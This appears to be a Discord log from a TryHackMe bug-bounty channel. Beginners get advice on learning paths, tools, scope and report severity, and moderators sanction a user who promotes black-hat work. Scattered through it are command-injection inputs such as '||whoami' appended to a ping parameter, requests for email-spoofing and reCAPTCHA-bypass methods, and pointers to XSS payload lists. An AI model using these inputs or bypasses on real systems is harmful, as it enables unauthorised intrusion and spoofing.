#bug-bounty

No problem, if you ever need anyone to chat to about what you're working on or any advice feel free to ping me 🙂

Most definitely will. Appreciate you 🙏

One last question my man @native token ....do you think with extreme hard work and hours invested learning and becoming good could I find a couple bugs within my first 3 months and perhaps make it a living eventually??? Obviously implying your at it 24/7 ?

Possibly, it all comes down to the person learning and how well you can pick it up. I wouldn't say it's a good idea to try 24/7 until it clicks as it can lead to really bad mental health especially if you don't find anything for a period of time

If u start out trying to make money in BB you're going to have a hard time. A lot of time invested, not learn alot, become extremely frustrated and probably burn urself out.

Unless you have a strong background coming into it

hi

Hey

Hey! Did you know that TryHackMe has its own bug bounty programme? Well you do now!

As with a bug bounty programme for any company - you must read & adhere to their rules and policies. Here is TryHackMe's: https://help.tryhackme.com/miscellaneous/the-bug-bounty-programme

Ensure you understand what you can and cannot do before attempting anything and adhere to the disclosure policy

Hii
Zuber here

Thank u !!! @native token @quasi pivot

hi i am finding a group who can become a partner for hacking with me. and learn together if anyone messages me........ 🙂

#689615473620287603 might be a better place to ask for that 🙂

yeah!

@drowsy birch I would love to be part of this group, still learning my craft but I think it would be more efficient with people to work with

yeah come in message

Hello every body can anyone give a Methodology to hack in bug bounty i am really stuck

Check the pins they will help

Allright

Find an issue with an api, get beer money pay

Hey I’m new I wont complain

Hahaha

But do you recommend tools (free) ?

Zap or Burpsuite

In nahamsec's resources in the pins, there is an entire section with many useful tools organized into categories.

Alright thx

Hi everyone
Im interested in how can i find vulnerable ID,PARAMETERS &etc in web apps for SQLi? Can anyone give me advices? Or some tools to do that? Please

Check portswiggers web accademy

Is the zap works same as the spider was working in old burpsuite?

It can serve a similar purpose

Ok

read js files for endpoints, or just fire burp and click everything.

https://www.bugbountyhunter.com/guides/?type=javascript_files

Thx guys

found XXE on a bugbounty program XD yesterday

Do you hide your identity when performing bug bounties?

I mean, it's in the scope, but you're literally attacking them. So, I don't think it's a good idea to use our home IP right?

(Other options like VPN may or may not work depending on the technologies the clients use)

Some use a VPN/VPS some don't at all

Not at all, as in "attacking directly from their ISP-given IP address"?

Yep, i've seen a few people say they haven't used a VPN/VPS at all

If you're not doing anything out-of-scope, no need to worry about being in trouble

Companies like bug hunters, because they're basically a "free" workforce

I would suggest to use a VPS/VPN when you are scanning/reconnaissance as you might hit Akamai/Cloudflare and get your IP banned for 2 weeks and then you aren't able to visit stores/shops/game services.

If you do get hit by Akamai you can check it out here: https://www.akamai.com/us/en/clientrep-lookup/

Common practice is using a vpn so that aggressive wafs don’t ban your ip. Vps are used commonly to perform enumeration and scanning so once again you don’t get banned

Vpn is likely more important than a vps if you aren’t doing aggressive scanning

You mean an akamai WAF? I thought Akamai was an ISP. I'll look up on that

And yes, a target I was snooping on is using CF. But I'm not worried about getting banned (I would take measures if I did agressive recon)

doesn't have to be aggressive tbh. One of the programs I was hacking on would ban your ip for 6 hours on CF if it detected any malicious payloads etc

Well Akamai bans you for just using subdomain discovery tools

But they work with reputation

The owners of a website can set the reputation requirement

Hey @tawdry horizon just launched his first bug bounty course! You can purchase it at a discounted price (60% off ) by using the code nahomies on udemy:
https://t.co/8WOslifHsb?amp=1

https://twitter.com/NahamSec/status/1364614903705731072?s=20

Hey guys just doing the google dorking room and have a question about intitle: index.of

I was wondering why the adresses/names of the websites were blanked off from the lesson. As it says:
“I have blanked out a lot of the below to cover you, me, THM and the owners of the domains.”

try this guys

hello hello me and a friend we would like to start bug bounty a bit, does anyone know a good platform and there are no risk in bug bounty?

Hackerone, Bugcrowd, Intigriti

There's no risk as long as you stay in scope of the programs

Okay thank u

hey people, new person here

Question for bug hunters - what was the first bug bounty you turned in?

bruteforce on login 😆

LFI,XSS,default creds 🙂
Thought i just found a SQLi... turns out t be a false positive, yay for that.

Phising using history.back() , that got N/A
Information disclosure on error message. (Informative)

Mine was an XSS on tryhackme, along with Muirland

Where abouts?

In answer boxes, a room creator could XSS anyone going back to the page by changing the answer

Ooooo nasty

It was stored, we discovered it when some answers with special chars in were being weird and truncating. Turns out the bits that were lost ended up in the HTML tag and you could create attributes

This is great, I'm quite new to this and had not heard of history.back() or LFI. Learning more from googling, but still wish I could ask you all a ton of questions.

@vocal folio That you found your first bug bounty on the website you were probably using to learn is pretty neat.

I'd done some XSS stuff before, but was otherwise pretty new to hacking

Did you find it because you were creating a room, or were you just poking around at different things you could do on the site?

Trying to work out a bug with a room

I expect because showing directory listings is often a misconfiguration, and a great many websites would be reasonably upset at being featured on an infosec site as such.

right pointing backhand index?

👉 I suppose

Hi, I'm testing an OAuth implementation and the state parameter contains the same value for every user and doesn't change if I try to login as different users or same user multiple times. Can I abuse this in any way or isn't this a vulnerability?

!github

Hey, I'm (very) new to bug bounties, and just playing around with XSS at one of the hackerone programs.
The site I'm looking at has a profile where comments can be shared. It seems to take the user input, send it with javascript back to the server { "body": "whatever you enter"}, and then it comes back in javascript as well and is rendered on the page.

When the user data comes back, some characters are changed into unicode (I think it's unicode): for example, > comes back as \u003e in the server response, so "body": "<script>" comes back as "body": "\u003cscript\u003e"

Is there a way to get around this, escape the encapsulating javascript response, and get XSS?

Or, is there anything useful you would gather from this response, or just say its not worth digging into more?

wait what you’re new to bug bounty and got xss on a program

damn

or are you doing hacker101

There isn't XSS

Not yet anyway

Not unless they get around the filtering

right, no xss yet, just poking at the filtering. I have googled around for workarounds for the javascript to unicode filter, but didn't find anything and was wondering if anyone here had insights to share.

Also please let me know if I'm posting in the wrong place. I'm new to thm and bug hunting.

As someone with no authority, this feels right. However I'd note that you can see a lot more of the server if you verify your Discord with your THM account!

hey thanks for the tip, just did it

Nice! No problem!

Yessss, this is the right place

Yeah so I'm just poking around here, and I think it goes out in a json, and lets say I enter < > / \ ! | . & ( ) in a comment, to test special characters:
a POST goes out with:

"body": "< > / \ ! | . & ( )",
...}```
it comes back as
```{...
"body":"\u003cp\u003e\u0026lt; \u0026gt; /  ! | . \u0026amp; ( )\u003c/p\u003e",
"raw_body":"\u003c \u003e /  ! | . \u0026 ( )",
...}```

now in the return above, \u0026 is unicode for &. it seems to take the < and >, turn them into &lt and &gt, similarly & into &amp, which kind of makes sense because those are the character entity references for those characters.

And ultimately, the comment is published on the page as:
< > / \ ! | . & ( )

Any advice for sending stuff out in the POST to try getting XSS?

Hello, I am trying to play with a ping functionality on a website. The original request is {id:3,method:"rant.ping",params:["192.168.1.5", 0]} and original response is {"id":3,"result":{"JSONRPCType":"CallableReference","javaClass":"com.redacted.network.RemoteAccessProcess$Stream","objectID":315777588}}
Then another request is made {id:4,method:".obj[273619413].getCommand",params:[]} with the response {"id":4,"result":"ping -n -c 10 -W 2 -Q 0 192.168.1.5"}

So now I tried adding like ||whoami , &&whoami after the IP in the first request, but then the last request end up removing the IP and my command, like this {"id":13,"result":"ping -n -c 10 -W 2 -Q 0 "}

Any ideas what I can do do to avoid this?

My first intuition would be that "rant.ping" fails to parse the IP address, so it is blank when the ping command is constructed.

Yeah that might be the case, have any ideas how can I play with this? I tried replacing IP with domain now but it couldn't resolve it

ping -n -c 10 -W 2 -Q 0 dl23l1j6c95qzxfiygccbqedy44usj.burpcollaborator.net                                                                      
ping: dl23l1j6c95qzxfiygccbqedy44usj.burpcollaborator.net: Temporary failure in name resolution

https://twitter.com/zapstiko/status/1367821842476453888?s=20

Maybe it's possible to enumerate the internal network? Or, maybe there is a way to find some kind of input that passes parsing / validation but allows command injection (e.g. weird hostnames, IPV6 addresses)?

Yeah I got some different commands: ping, traceroute, dig, nslookup, but haven't found a way to get out of the parsing they do

The requests are a bit weird, not sure exactly how the backend works

Can any one suggest me some good machines that will help to improve bug hunting?

There’s not really any machine per say that will help directly with this but portswigger has an amazing training program that’s free that touches on oswap top 10 you could check out @marsh lava

Ok thanks @native token

Is there any CVE for nginx/1.16.1 , I tried googling but i am not so good with searching exploits

or security exploits*

I'm gonna make two statements, and I think someone's already discussed them with you

1. Many bug bounties have an NDA

2. What'd stop us from stealing the bounties?

There are sites with CVEs broken down by product version

I'd start there.

The program name because i haven't said it 🤷🏻‍♀️
and any such website name please , i will google it

That was easy.

Ahaa cool thanks

Try googling what you want first

Because google has infinite patience.

Note that, sometimes a CVE entry does not provide the version of the product that is being searched, but rather provides the version of the library or other component that the searched item uses. For example, for NGINX, there are 2019 entries that show the version of njs, the scripting language for NGINX, without mentioning the version of NGINX.

Hello I sent an e-mail 2 days ago to report a bug, but there was still no reply. When do you return?

If this is for THM then shouldn’t take more than a week

Yea, for THM. 2 days have passed now thanks for the information

If you don't get a reply your bug was likely low severity 🙂

Generally the admins to don't reply to duplicate bugs / low sev bugs

Oh maybe. But we take time for it, I think they should give a positive or negative reply

I think they should do, but they're very very busy 😦

Thank you so much for submitting though!!!

We appreciate it 😄

😂 😂 😂 😂

.

How serious of a bug is being able to leak chat logs?

Depends on context and whether the user should be able to view chat logs, what the logs contain etc

It could range from a low all the way up to high

Aye you can view the whole chat logs, thousands of them. Tis my first submitted report xD

hi can we bug bounty being a minor if yes can you give me a reliable platform that accepts minors thank you

Some programs require you to be a certain age but there are quite a few that dont have an age limit Hackerone and bugcrowd are pretty big platforms check them out

But if you’re a minor in the ToS you have to get your parents to submit the report

And this is bugcrowds

Thankk you

Yeswehack dont accept minor?

my parents agree

Yeswehack I couldn't seem to find but you'll have to read the programs scope

last little question after i stop bothering you xD bug bounty requires a good level?

As some may say you need to be 16 or 18+

Not really, as long as you know web app hacking

There have been people who may have started and got a bug in one month being new to it and some other may take time, I remember speaking to someone and they said it took them 6 months to find their first bug

I am only 15 years old and I am interested in pentesting it is my passion I have more or less the basics but I wonder if it will be enough ....

As long as you're passionate about it you'll do great

Passion and dedication goes a long way

thank you very much

@fallen palm also you can select 3 options:
Be white hat but get less money
Be grey hat and get more money
Be black hat and get most money

No.

!rule 9

Rule 9: No discussion of illegal/unethical topics or actions. If the target device doesn't belong to you, and you don't have specific permission to perform an attack from the owner of the target: you don't do it, and we don't talk about it. This also applies to software licenses / copyright violations. If in doubt, please ask a moderator before posting your message -- preferably without breaking rule 1. Whether an action is illegal or not is at the sole discretion of the moderation team.

White hat or no hat.

@lavish hollow I said only options

Read the rule "No discussion"

So word black hat is banned lol

Telling someone they can earn more money for being a black hat is unethical and bad.

I'm not black hat, I'm white hat, I just said what's true

have u heard smth called jail

Yes

-warn @inner sierra Do not discuss blackhat activities. Especially do not encourage them.

⚠ Warned Adduck#0646

I only said sad fact

Also 50% of ppl learning want be below grey

-mute @inner sierra 5m Please stop arguing. Encouraging blackhat activity will not be tolerated.

🔇 Muted Adduck#0646 for 5 minutes

But let's get back to white hat

How many € can someone get for one bug?

Depends on the company & bug.

Google, security bug

depends on the vulnerability and impact

For some medium learned person, can get Gmail access

For example

If you mean someone else's email, that will probably have a big payout.

About?

Depends how you get gmail access

they won't accept brute force

What about this example

Checking their program description would help you more than asking someone?

You will get it with help of forgot passwordLOL

https://www.google.com/about/appsecurity/reward-program/index.html

1. Make basic report
2. Make complex report

what?

Nothing

Most companies will have a bug-bounty contract which tells you almost everything, rewards included. It is important to remember that these payouts are most likely not enough to live on.

What’s the best way to get into bug bounties? I have a basic-intermediate understanding of Mac and windows OS exploitation. I just can’t find anything straight foreward online

Learn web hacking

Sadly having knowledge of OS exploitation isn't gunna help too much here, best thing is to scratch up on your OWASP top 10 and also OWASP WSTG

I need some help understanding this— I can scan webpages for open ports using nmap, and usually they come back with ports 443 8080 and 80 open. How can I exploit them?

Thank you bye

Btw

If there was a simple answer there, everyone would be doing bug bounty.

You need to learn web hacking.

How? Any good websites? I’ve been looking for a while but can’t seem to find any

TryHackMe. Portswigger academy. Don't scan random websites.

Great. Thank you

Bug bounty seems to have a false stigma that it is beginner friendly, when in actuality it isn't even close

Unless you put enough time to fully understand what you are testing for you're unlikely to find anything at all and just waste time. You have to remember the websites that are offering bounties have likely already had a pentest/red team evaluation so you're literally clawing for the bits they missed

That’s seems to be similar to what I’ve gathered before from my quest to find easyish bounties. Thanks for confirming lol

Good Morning 🙂

Is this still for a CTF?

When i use forgot password on a website , it itself changes the account password ( generally we have the password reset link right ), but here we directly have the new password of the account , So if I send 100's of password reset request , I can't login because the password gets changed literally every second , an attacker could use a VPS
Impact: Deny access to the genuine user into his own account ( even if he his into the account because the cookies will expire sooner or later )

Worth reporting ?

i assume you need to be logged in do request the password reset?

no

so anyone can reset anyones password ?

forgot password

yup

and unlimited times

of course thta's worth reporting

Well i can reset , but i won't know his password

how will the user know the new password?

His mail

i see

that's a weird way to implement this so yeah i'd say report it

@spare cairn can I dm you? 🤔

but if I changed his password every second , I don't think his inbox would be of any help

yup , I am always open to dm

@jake what should the weakness though
It's caused by rate limting but deny access to the user ?

@quartz aspen

uhhh

well there definitely should be some rate limiting

but i've never submitted a bug before so i don't know the format sorry

oo nevermind
thank you for the help🙂

Reported !

Another doubt

On signing up , The Sign up token is disclosed visible via the network tab>response
that means I can sign up as any email because I will have the token
Any way to make it more severe ?

@spare cairn Best odds is try and use that to sign up with an email from that company

e.g if you were creating an account on logitech try thegoodguy@logitech.com. Sometimes they will give accounts from their own trusted domain additional permissions

I already submitted by I tried , It treats every account the same irrespective of the email domain

1 got Dupe
waiting for the second

Dupe is still valid one, congratulations

Gj

Still not sure , the triager didn't added me in the original report
I requested to , let's see

Aslong as u learnt something it's not wasted time :)

ugh second one got duped as well

it seems luck is not in my favour 🤷🏻‍♀️

Question ~ If an "alert" payload (cross-site scripting) was echoed on a site in JS code, would that be enough for a report? I'm new, so sorry if it's a dumb question lol. Not sure if I need to "prove concept" anymore than just researching the impact of it. along with directories base64 encoded for the webserver. fishing around those now to see what goodies i can find.

Well that is a really weird way to implement forgot password.. Normally you get an mail like "reset your password via this link XXXXXX" and then you can change it.. It shouldnt change automatically seems like a bit of lazy programming ?

So the weakness is that is automatic change the password without any verification, check if you can catch an account-ID with burpsuite while requesting this with an email.. Maybe you can manipulate it to an admin account

So lets say your account is ID 190 and you catch that change it to ID 1 and you probally get an password in your mail from an account with to much rights 🙂

Might be, but the bounty is probably not going to be that high. Thing is, you already found a weak point so you might be better off digging into the weakpoint you found to test how serious it really is. Then you'll probably get a bigger bounty.

thanks ❤️

Good luck with it! THM has some seriously good rooms for XSS if you need to freshen up your skills

I chained with with no rate limiting on forgot password
and the final impact was i could deny any user access to his own account by changing his password every second
But both issues were already reported

hello everyone, i have a question

Do you think it is possible to have good bug bounty results without using burp?

It's possible yes, you also have ZAP

never heard about this, i'll check this rn

okay now i see, thank you

hi guys i'm Othmane and i'm honored to be here with you , so i wanna start bug bounty and i don't know where i start i need some help , i'have some questions about bug bounty and i have basic of information in it field i'dont need hwo tell me step by step but just tips and thank you

Tip 1. Don't expect to make money from it. Don't do it for the money.

yes i know this but i need some platform or book for beginners kind of this ?

https://portswigger.net/web-security

thank you , this my last questions what's the difference between penetration testing and bug bounty can you explain to me please ?

Did you google it?

Because google it

I watched a lot of video on Youtube and i'dont found the response

It is a basic research question

You will not get far in security if you cannot research. We will not do your research for you.

thank you for your time

@grand thistle We don't do those links here

pentesting is usually testing an application prior to it's released onto production servers, or returning to an application after several updates to identify vulnerabilities.

Bug bounty is kinda like a cleanup crew who go hunting for the bugs that the pentesters may have missed

thank you

No problem, I get some questions aren't always easily answered online 🙂

A lot of manual labour

robots has it's uses but you need to be able to figure out for yourself which ones may be of interest

https://github.com/andresriancho/enumerate-iam
got this script to check for iam permissions with aws tokens
But this script hangs after a while
Any other alternative script anyone uses ?

Hi guys,
After several attempts, I think I encountered a problem in the Alfred room.
I followed all the instructions correctly (I think), but I cannot find the root.txt file.
I did a search -f root.txt or even look in C:/Windows/System32/config (as found in writeups), but nothing.
Does somebody have an idea?
Thanks
PS: I hope to be in the right group

@empty horizon #room-bugs but you've probably missed the step where you need to migrate.

You can ask for help in #room-hints or #room-help

@vocal folio ohh sorry will move in this room. you are probably right but I can't find my mistake

will do thanks @vocal folio

Export the directory,file list to a text file ,and use gowitness on it ,so u will have clean ss of all ,then u can choose where to look.

Would you say an account switch in the url is a bug when password authentication gets ignored by it?

Are you already authenticated in the other account?

Nope

Not a bug. It’s a feature 🙂 @fallen palm

Ah. So a currently signed out user can be relogged like that without authentication again?

cookies but automatic sign in if you manually signed out🤔
It's sus

Hey! I've just found my very first vulnerability on a website, it lets a malicious user to send a customizable mail from the website official email adress to any of the website user. Any potential attack other than social engineering?

That's not really a bug bounty bug tho more of a pentest style bug

using https://emkei.cz/ ? Many times that OOS , so just be sure
I don't think there is any other way of exploiting it

yeah I know , this type of bug won't be paid for

Welcome to the fun part of bug bounty. You have to figure out a payload that bypasses it

It's where most of the money comes from in bug bounty

finding bypasses for existing filters

Good luck finding it

Chances are you'll find the CF IP and just get direct access denied

Dropping this here... don’t go scanning like a clown when attempting bug bounty

@prime cipher Think I might go for this - https://www.amazon.co.uk/30-Piece-Lock-Transparent-LockCowboy-Locksmiths/dp/B07WYPJSD5/

Looks good 🙂

is sqlmap not the way forward 😮

Naughty boy!

That wasn’t aimed at me

This is an email a program sent out and is doing the rounds on Twitter

ffuf scan caused outage 🤔

That must have been a lot of requests for that to happen

I wonder how much threads they run to cause that

Might shock you to know that it does happen with any scanning tools

I’d probably take a guess and say it was someone using axiom

I know but I always set the thread to low , 1-2 request per second

that mail said 100 request/minute , that is not even 2 request / second , that's slow

That’s the rules of most programs

Slow it may be but realistically, tools like ffuf aren’t needed for much bounty work

Maybe to scan an api but if you’re straight up brute forcing from the get go hunting for directories you may wanna reevaluate your approach

I just use burp and sometimes gobuster

ffuf scan causing an outage? bruh

when they host their servers on the free tier

@quartz aspen that's a new level of ignorance... Http/s traffic caused when brute forcing on high threads can cause it to happen

for sure, but the server should have enough resources to handle it from one client, especially if they're hosting a bug bounty, the second comment was just a joke lol

Fire axiom at it with ffuf and you'll soon realise that it can be used as a tool to dos a site

i'm not sure what axiom is

https://axiom.ai/ ?

https://github.com/pry0cc/axiom

you can just spin up 15 boxes, perform a distributed nmap/ffuf/screenshotting scan

so it's not from one client

Yea I want to bypass the cloudflare IP, but I tried a lot, and It never worked :/

https://twitter.com/0dayCTF/status/1377414299367313409

https://nordvpn.com/blog/nord-security-bug-bounty-launch/

https://packetstormsecurity.com/files/156269/Google-Invisible-RECAPTCHA-3-Spoof-Bypass.html#:~:text=This tool allows a user,providing the victims site key.
Is this still valid in case anyone used it recently ?
Bypassing google recaptcha v3

what would you say your guys bug bounty methodology is? i assume it starts with gathering endpoints, subdomains, exploiring the site, etc

For now , I don't do heavy research , just check the sign up, login , forgot password password endpoints then in the account , no extra tools except burp ( that too when i need intruder )
I will slowly move towards using enumeration
But for normal Bug hunters , it's what you mentioned

I don't have any idea but many beginner bug hunters usually look for xss and idors

@short drift This is usually the initial stuff I'd check for.

you have good resource for google recaptcha v3 bypass ?
It doesn't give any captchas to solve but generates token so i can't use try that endpoint in burp

Not so much resources but take a second to look at how the handshake works

usually it'll return a completed hash (Nut sure about v3) which is used to identify that it has been checked

If you drop the request that it is sent, check if it times out

if it isn't timing out or set to destroy the hash after it's used, then that's an issue

I don't tend to focus any amount of time to it lately though as it isn't usually anything major

I could enumerate emails if i could bypass it
I mean i can still do it, but it's manual

I mean from what I understand recaptcha 3 has only been going strong for 8 months or so

I'd say fiddle and try find a bypass yourself as then you can start doing the rounds on all programs with it implemented

umm that's what i am trying to find
Thank you for the help 😄

Chances are if anyone has a bypass they aren't disclosing as it's a great income

yeah i understand , let me do some research

https://mikko-kenttala.medium.com/zero-click-vulnerability-in-apples-macos-mail-59e0c14b106c Vulnerability reported in May, fixed in July, publicly disclosed in November and still being evaluated for bug bounty.

for those looking to improve bug hunting methodology here is a good resource from @mystic moat ❤️ https://thexssrat.podia.com/free-bug-bounty-guide-essentials-video-only-slimmed-down?coupon=SFGHGFHFSTGHTRRBSFNFGSHSGFHBGFSBHB&product_id=HzT_ERAFTskvypW9Hg_kfA%3D%3D&product_permalink=iRXod&sale_id=-2RemKOgZrkfGdDvCJKm4A%3D%3D

Hello anyone here

Yes

if i add single quote in page parm and it delays a lot and when I delete it it works

is this sql injection I tried a lot of payloads to make sure but all made delays only is there any

unless you're calling some sort of sleep function within sql, probably not

there might be a lot of data to search through, so it might take time to search the whole dataset for a '

Hey. Is it possible to exploit OOB XXE without Burp Collaborator? Im kinda new to hacking

Bug hunting tips whole book https://gowsundar.gitbook.io/book-of-bugbounty-tips/api

If the program is not running cloudflare try launching sqlmap and see if u get anything .

I just submitted my first bug today

P5 though 🤡

Bug bounty's are way different than CTF's

Gj

Hello Fire Drago

Whats your username on bug crowd

Yes its possible u may also use DNSbin for that basically the idea is to use the server u control for getting response.

Just realized there is no follow feature on bugcrowd

hi
i am testing a parameter that reflect my input in a java script function ..
my input is "123" :
the result is :
var _nifra = true;try {if (window.top != window){_nifra = false;}} catch(e){_nifra = false;}if(_nifra && typeof 123 === 'function'){123(true);}

the prameter name is {JSONP_call=}

any help?

@everyone

what

Serpscan is a powerful PHP tool designed to allow you to leverage the power of dorking straight from the comfort of your command line.
https://alaa0x2.medium.com/serpscan-automate-your-recon-using-search-engines-6a8cc2b1a3b3

Guys can anyone help we with creating a PoC ? One of my clients has missing SPF records but I need a PoC and emkei.cz is not working anymore

heyya , missing spf record is mostly out of scope , please do check the OOS before submitting it

what's the bug ?

It was a blank page and if you enter something in url say url/some_text then the website showed some_text on screen

Not a big thing ig

Yeah did that, that's why am asking

tried xss ?

Yes but it didn't work

is the program public ? I will have to check a bit

There is some server side cleansing

Which prevents me to add anything

oo ok nvm

No it's a contract based thing

Part of my internship

Usually Emkei does the trick

let me check the web

But it's not working right now

not even to spam folder ?

Nopes

It's showing that mail is sent

But doesn't even show up in spam

I tried adding a "Reply-To" header but even that doesn't work

sorry but without the domain info , I really can't help you
Maybe try reading hackerone reports

More than the domain, any suggestions for an alternative service ?

I tried most of the listed ones but none are satisfactory

emkei is best in this term
maybe the service is not vulnerable

It is because I tried some other such other services but they charge bucks or else, send a post script note :(

https://github.com/mikechabot/smtp-email-spoofer-py
never tried it though

Tried this

But I don't have a SMTP2Go account

:(

Did u tried html injections,ssti?

Ssti typically depends on how the server is processing data. Very rare you’d find it in this instance

Sorry i just woke up

I tried all of them mentioned in web application hackers handbook

Question: I hear Bug bounties are competitive in nature which makes me feel a bit put off from getting into it.
I am studying cyber security and looking to get into Pentesting but also want to live in other countries at the same time which is attracting me to bug bounties instead due its remote nature.
I have a passion for cyber security in general but i really want to find a way not to be tied to one company because i love living in multiple places all the time.

I know its a bit of a random question i guess im having a direction crises right now

My goal is to live and work remotely, i do have other online business setup so i would not just be relying on bug bounties.

free lancer

do pentesting some time bug bounty and live ur life but u have be very experienced for it

@young leaf Could TryHackMe be a perfect place to learn for bug bounty?

It can be, TryHackMe teaches you skills that you could use doing bug bountys

I have been using tryhackme and a few other sites. Are there anything else I need to learn before doing bug bounty.

You should always need to learn new things

Where else could I learn?

It isnt about that you learn from 10 different places, tryhackme should give you a great fundament for bug bountys

But you could go for OSCP or something like that

I'm using their labs.

It depends on how you are, bug bountys can be hard from what I have heard on a few podcasts it takes days or weeks to find a bug

But it all depends on your skills 😉

@hardy ginkgo I feel like there's more I need to learn.

Then you should learn more before starting

Ok.

Go through the web fund path

That will give you a good basis

@hardy ginkgo How do hackers find new vulnerabilities? Where do they look first?

They mostly start with exploring there target to find odd things outdated stuff etc

But cant say for sure I am a beginner myself ;p

But with a lab I normally start scanning the hosts to see what is up and running after that if theres a webserver available checking for vulnerabilities and hidden directorys etc

You should learn yourself a basic set of steps that you always will perform to get information about the target before starting to exploit

Ight.

You could ask these questions in general there are a few OSCPs that are really advanced

Oscp won’t really help with bug bounty as much as something like portswigger tbh

Portswigger has a massive lab that covers owasp top 10 and are likely to be found in webapps

I wanna be a bug bounty hunter but how do i start?

@hardy ginkgo

Learn the fundamentals of web app testing from thm and portswigger, become very familiar with owasp top 10 and practice. You’ll be a step closer

@faint forum check pins

Anybody have a pentesting video to complete knowledge??

Ty

That's a very vague question my friend

Pentesting video

On what topic? Penetration testing and bug hunting are different.

On url https://tryhackme.com/paths , a request is made on http://www.w3.org/2000/svg , shouldn't it be https? It may only be on the Pentesting Path page

Bug hunting

Hey im getting through portswiggers academy but i need an alternative to Burpsuite Intruder for brute-forcing parameters.
Its very slow due to the rate limit.
Any ideas?

Owasp zap

It has a feature like intruder?

Im trying to brute force a number from 1000-9999 from an intercepted post request

Its intruder is more fast than burp cm

I have used owasp zap on portswigger and its perfectly fine

OK perfect thanks i will check it out

Im going to use ZAP and burp together until i can afford a PRO license

Or then again, get comfortable with ZAP, and see if you still need burp for something 🙂

Well i still prefer burp cm bz of its clean ui than zap ,only use zap for intruder based attack but that's just my preference

Sure, that's up to your preference.

Get ur base ready first do thm web app path,portswigger and then watch nahamsec for live recon,stok,insiderphd and zseno's live bug hunt.

Im trying to intercept a request with ZAP and then edit it, and then send it to be fuzzed but the edits are not reflected when i send to to the fuzzer

Im trying to solve this lab with ZAP but zap is all new to me
https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-broken-logic

Hey i am a 13 years old I wanna become a bug bounty hunter how can i start?

Why are u asking same question again and again lol

Honestly, the best way to start is learning the paths on TryHackMe and to build a foundation on learning how networks and web applications work. But, what do I know I only been doing this for 34 days.

.

Ok i will try tryhackme

Because I don't understand the github link

https://academy.hackthebox.eu/ this can also help

Ok

It's paid🥲

🥲 🥲

@elder junco u have any free course?

try https://portswigger.net/web-security/

Its free

Ok wait

1 - Can u already hack?
2 - Why do u want to do bug bounties?

Ya i was a cr4cker a month ago

I want to join bug bounty because I liked that field and in future it will have higher demand

If that is what I think I'd quickly think about ur position here, we are ethical hackers here.

If you are chasing the money from the get go, thats a bad idea. Use it as a learning experience.

I know u r ethical hackers

Ok then which field I should go?

Web or app

Doing bug bounties is fine but A LOT of people start it chasing the money. You can go like 4 months and only make $100. You're better off learning hacking as a broad subject then applying urself.

That's up to you, they have similarities depending on how you look at them.

U will not believe what I am saying now

I am 14 years old kid lol

But I am interested in hacking and all this kinda stuff

Ok then I will learn basics of bug bounty then go for ethical hacking

Aye use TryHackMe and get your general hacking knowledge down. When you're comfy try poking around a few bug bounty programs

If u jump straight to bug bounties you're going to have a very bad time, also potentially be kicked off the programs.

Can I have link for hacking of tryhackme

Lol

@quasi pivot tell till where should i learn

i am at linux commands part 2

@faint forum there is no end to learning

#start-here

Everyone u see doing bounties keep learning

!docs free-path

I've learnt A LOT doing bounties, I started doing them for this reason.

Me too. Most important lesson i learnt is,
There is only one chance to prove impact. So don't be lazy.

😅

I always panic write the writeup cause I dont want a dupe (had 0 dupes so far)

I reported a bug " Phishing using history.back() fuction" but i made it that way so user have to click.
They said more info.
I supplied them webpage and attack which requires no interaction but didn't got reply lol

@quasi pivot which operating system is best kali or Ubuntu

Noice lol

For starting out I'd use Kali, then move on from there if u want
For bug hunting I personally use Windows and an Ubuntu VPS

hmm

ok i will go for kali

And I have a question what are labs @tall slate @quasi pivot

On TryHackMe? They're machines you can attack. We tend to call them rooms.

hmm

Which one do you guys like hackerone or bugcrowd

what r they?

Dw abt it yet

They are more platforms for hacking

Ok

I like hackerone.

I too use hackerone

Hackerone is good I like it too

I also use intigriti

That im yet to try tho heard its good.

it is

It is the biggest in europe

Yeah they mainly have European companies ig🤔

Yes

idk if it is only european companies but i think so

But they still have a lot of companies

Cool

hackerone and bugcrowd are the most famous ones followed by intigriti,synack,yeswehack and some more

I really want to join Synack

I am going to subscribe to HTB to do their path on Synack RT

Hello people i need some help about bugcrowd site

What help do you need with it?

I just need someone who will explain me how to do it.I mean i can read what is in the scope and everything but i dont know how i can start....So i need someone in my dm who will help me.

check for vulnerabilites which is not out of scope , some common ones are stored xss and idor
When automating stuff , don't sent more than 1 req/sec

I just dont understand how people starting searching for some stuff i know people use burp but they just start burp suite against some site and thats it?

site which have programs on bug bounty sites , you have to learn about different vulnerabilties

portswigger lab is a good resource

basically , find a good program , read their policy ( in-scope and out of scope )
Try to find vulnerabilites in their site making sure to not affect other users ( no dos mainly )

So i can use burp suit and connect on their website?

yup

As long as you're not doing anything OOS you'll be fine

Hey has anyone worked with AWS ?

Can anyone tell if X-Amz-Credential means something important ?

https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-query-string-auth.html

https://stackoverflow.com/questions/34294685/is-showing-x-amz-credential-or-any-amazon-stuff-publicly-okay-in-form

Sighs

Thanks people

This is what I got today

Congrats

This is infuriating me.

Yesterday they said they're paying a bounty and wanna get an audit done

And now this

Ah, do they have a bug bounty program?

No, it's a place a friend works for and they asked me to take a look and yesterday they sent a mail for $$$

Then that's expected. Though even what they are offering without a Bug Bounty program is a good catch.

This is yesterday's email

Did you tell them about the mail about the $$ you received?

Yup. These corporates are horrible.

They legit had a "backup" of their config files lying right there on the server along with some Rate Limit Bypasses

im doing bug bounty rn, is there any obfuscated xss payload that doesnt use < ?

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS Injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt I'd check these out maybe some will work

ight thx

Ah bypassing filter i see,open twitter seach #bugbounty followed by vuln. name u will find alot of bypass,gl

I found a param which reflects the text on the site
Maybe it is vulnerable to xss , the program is from intigriti and currently suspended , but may become active
Anyone want to collab ? If we get a bounty , your keep 75%
DM 😉

is this worth looking into

or no?

That's user supplied text being handled safely - escaped properly but I believe escaped twice?

ight

i have a question

if i make an new account on a website add 2fa and link an google accout

then logout and login via the google acc

and theses no 2fa needed ?

is that bypass?

No, because all you've done is switch the verification over to Google

alright thx for the help

🙂

While hunting i came across one Url which reveals the account token and with the help of that token i can reset password of that account?

So this vulnerability is which type of vulnerability..

Ans should i report it

Please tell me

If it’s just your token, I don’t think it’s reportable. If you find a way to get other people’s tokens, I would definitely report that

Okk working on it!!

Can someone tell me what the hell is this

The contents moved out on specific payload

I can print things outside the box 😂

peace and love

